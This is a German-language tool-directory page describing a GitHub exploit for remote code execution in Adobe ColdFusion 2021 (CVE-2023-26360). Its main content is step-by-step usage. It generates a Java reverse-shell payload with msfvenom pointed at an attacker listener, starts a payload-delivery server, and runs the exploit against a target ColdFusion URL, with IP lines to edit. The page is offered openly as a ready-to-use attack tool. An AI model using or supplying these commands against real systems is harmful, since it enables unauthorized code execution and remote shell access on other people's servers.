Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-26360-RCE — Exploit für Remotecodeausführung in ColdFusion 2021 (CVE-2023-26360) | Kitploit
Tools/GitHubGitHub/h3rm1tr3b0rn/cve-2023-26360-rce
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubh3rm1tr3b0rn/cve-2023-26360-rce

CVE-2023-26360-RCE

Exploit für Remotecodeausführung in ColdFusion 2021 (CVE-2023-26360)

Repository anzeigen
113vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-26360 - Remote Code Execution auf ColdFusion 2021

Manchmal funktionieren die Skripte nicht beim ersten Versuch. Versuchen Sie es ein paar Mal, damit es funktioniert

Ausführung

Erstellen eines Payloads mit msfvenom

root@kitploit:~
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java

Starten von server.py

  • Dieser Server sendet den Payload nach dem ersten Zugriff mit cve.2023-26360.py an den Coldfusion-Server, daher muss er zuerst gestartet werden.
root@kitploit:~
python3 server.py 8000
  • Das Argument 8000 ist der Port, auf dem der Server lauscht.

  • Es ist wichtig zu beachten, dass Zeile 12 die Server-IP-Adresse konfiguriert, also ändern Sie sie:

  • root@kitploit:~
    s.bind(('192.168.56.1',port))
    

    Ausführen von cve-2023-26360.py

    • Um den Exploit auszuführen, führen Sie Folgendes aus:
    root@kitploit:~
    python3 cve-2023-26360.py 8000
    
    • Wie bei server.py ist das Argument 8000 der Port, auf dem server.py lauschen wird. Daher muss es in beiden Befehlen identisch sein.

    • Zeile 8 in cve-2023-26360.py legt die IP-Adresse fest, auf der server.py lauschen wird. Es ist notwendig, sie korrekt zu konfigurieren.

    • Zeile 11 in cve-2023-26360.py legt die IP-Adresse des Coldfusion-Servers fest, also ändern Sie sie:

    root@kitploit:~
    url = "http://192.168.56.102:8500"
    

    Getestet auf

    • ColdFusion 2021 - Windows Server 2019
    Tool herunterladen